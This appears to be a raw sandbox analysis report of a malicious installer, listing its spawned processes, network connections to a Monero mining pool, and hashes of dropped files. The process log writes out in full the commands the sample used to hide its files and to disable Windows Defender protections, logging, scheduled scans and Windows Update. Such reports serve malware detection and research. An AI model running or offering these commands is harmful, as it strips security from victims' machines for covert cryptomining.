ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\Installer\MSIAF1C.tmp
"C:\Windows\Installer\MSIAF1C.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssAF1F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiAF1C.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrAF1D.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrAF1E.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe
"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B021.tmp\B022.tmp\B023.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10 /nobreak
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\Installer\MSIE2C0.tmp
"C:\Windows\Installer\MSIE2C0.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
C:\Windows\Installer\MSIE2C1.tmp
"C:\Windows\Installer\MSIE2C1.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
C:\Windows\Installer\MSIE2C2.tmp
"C:\Windows\Installer\MSIE2C2.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe
"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe
"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| DE | 162.19.139.184:12222 | xmr.2miners.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js
| MD5 | 12148d2dff9ca3478e4467945663fa70 |
| SHA1 | 50998482c521255af2760ed95bbdb1c4f7387212 |
| SHA256 | 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6 |
| SHA512 | f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license
| MD5 | d5f2a6dd0192dcc7c833e50bb9017337 |
| SHA1 | 80674912e3033be358331910ba27d5812369c2fc |
| SHA256 | 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3 |
| SHA512 | d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js
| MD5 | 7b33dd38c0c08bf185f5480efdf9ab90 |
| SHA1 | b3d9d61ad3ab1f87712280265df367eff502ef8b |
| SHA256 | d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88 |
| SHA512 | 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@npmcli\query\LICENSE
| MD5 | c637d431ac5faadb34aff5fbd6985239 |
| SHA1 | 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181 |
| SHA256 | 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21 |
| SHA512 | a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@npmcli\run-script\LICENSE
| MD5 | 89966567781ee3dc29aeca2d18a59501 |
| SHA1 | a6d614386e4974eef58b014810f00d4ed1881575 |
| SHA256 | 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3 |
| SHA512 | 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@sigstore\sign\dist\types\fetch.js
| MD5 | 8963201168a2449f79025884824955f2 |
| SHA1 | b66edae489b6e4147ce7e1ec65a107e297219771 |
| SHA256 | d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230 |
| SHA512 | 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\@sigstore\sign\LICENSE
| MD5 | f03382535cd50de5e9294254cd26acba |
| SHA1 | d3d4d2a95ecb3ad46be7910b056f936a20fefacf |
| SHA256 | 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0 |
| SHA512 | bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\ansi-styles\license
| MD5 | 915042b5df33c31a6db2b37eadaa00e3 |
| SHA1 | 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c |
| SHA256 | 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0 |
| SHA512 | 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\cross-spawn\node_modules\which\LICENSE
| MD5 | 82703a69f6d7411dde679954c2fd9dca |
| SHA1 | bb408e929caeb1731945b2ba54bc337edb87cc66 |
| SHA256 | 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b |
| SHA512 | 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\emoji-regex\LICENSE-MIT.txt
| MD5 | ee9bd8b835cfcd512dd644540dd96987 |
| SHA1 | d7384cd3ed0c9614f87dde0f86568017f369814c |
| SHA256 | 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a |
| SHA512 | 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\inflight\LICENSE
| MD5 | 90a3ca01a5efed8b813a81c6c8fa2e63 |
| SHA1 | 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a |
| SHA256 | 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8 |
| SHA512 | c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minimatch\dist\cjs\package.json
| MD5 | df9ffc6aa3f78a5491736d441c4258a8 |
| SHA1 | 9d0d83ae5d399d96b36d228e614a575fc209d488 |
| SHA256 | 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a |
| SHA512 | 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minimatch\dist\mjs\package.json
| MD5 | d0707362e90f00edd12435e9d3b9d71c |
| SHA1 | 50faeb965b15dfc6854cb1235b06dbb5e79148d2 |
| SHA256 | 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a |
| SHA512 | 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass\dist\commonjs\package.json
| MD5 | 95b08bc3062cdc4b0334fa9be037e557 |
| SHA1 | a6e024bc66f013d9565542250aef50091391801d |
| SHA256 | fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f |
| SHA512 | 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass\dist\esm\package.json
| MD5 | 6138da8f9bd4f861c6157689d96b6d64 |
| SHA1 | ee2833a41c28830d75b2f3327075286c915ed0dd |
| SHA256 | 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1 |
| SHA512 | 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE
| MD5 | 78e0c554693f15c5d2e74a90dfef3816 |
| SHA1 | 58823ce936d14f068797501b1174d8ea9e51e9fe |
| SHA256 | a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53 |
| SHA512 | b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js
| MD5 | a8c344ac3d111b646df0dcae1f2bc3a3 |
| SHA1 | d8a136b49214e498da9c5a6e8cb9681b4fda3149 |
| SHA256 | dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c |
| SHA512 | 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json
| MD5 | 1943a368b7d61cc3792a307ec725c808 |
| SHA1 | fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c |
| SHA256 | e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e |
| SHA512 | 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md
| MD5 | 1750b360daee1aa920366e344c1b0c57 |
| SHA1 | fe739dc1a14a033680b3a404df26e98cca0b3ccf |
| SHA256 | 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad |
| SHA512 | ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE
| MD5 | a5df515ef062cc3affd8c0ae59c059ec |
| SHA1 | 433c2b9c71bad0957f4831068c2f5d973cef98a9 |
| SHA256 | 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14 |
| SHA512 | 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE
| MD5 | 5f114ac709a085d123e16c1e6363793f |
| SHA1 | 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705 |
| SHA256 | 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39 |
| SHA512 | cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\npm-audit-report\LICENSE
| MD5 | 5324d196a847002a5d476185a59cf238 |
| SHA1 | dfe418dc288edb0a4bb66af2ad88bd838c55e136 |
| SHA256 | 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d |
| SHA512 | 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\read-package-json-fast\LICENSE
| MD5 | ff53df3ad94e5c618e230ab49ce310fa |
| SHA1 | a0296af210b0f3dc0016cb0ceee446ea4b2de70b |
| SHA256 | ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475 |
| SHA512 | 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\text-table\LICENSE
| MD5 | aea1cde69645f4b99be4ff7ca9abcce1 |
| SHA1 | b2e68ce937c1f851926f7e10280cc93221d4f53c |
| SHA256 | 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b |
| SHA512 | 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962 |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\tuf-js\LICENSE
| MD5 | 391090fcdb3d37fb9f9d1c1d0dc55912 |
| SHA1 | 138f23e4cc3bb584d7633218bcc2a773a6bbea59 |
| SHA256 | 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10 |
| SHA512 | 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\node_modules\wide-align\LICENSE
| MD5 | 9d215c9223fbef14a4642cc450e7ed4b |
| SHA1 | 279f47bedbc7bb9520c5f26216b2323e8f0e728e |
| SHA256 | 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11 |
| SHA512 | 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe
| MD5 | ad76b1a5d038cf31e2ec015b76cd3216 |
| SHA1 | c016f7f9bdbb10e7b29414fce08b5a6840be342f |
| SHA256 | f3bcbc5f620b9f271daa26ad0a01f55c4aeaf558b11a7b939f6f27c39bc17ffa |
| SHA512 | 2ebfdf579d61dfd796e3150d3ea07fa6723369aec42fb760e725b4715d45d1d38a2f9ace0f64b435c85aafeaf3c91b998432adee3135b79e06e4faa292259f9f |
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe
| MD5 | 70c2c0bdd31ab9c6dfb9739b81e67306 |
| SHA1 | 1d34a6bc3b093444dd8454f09cbf44ed853f6469 |
| SHA256 | db9cd3e731b7e994e9a00ec01856bea9cfd8c1378979946ae831e18285bdfb2f |
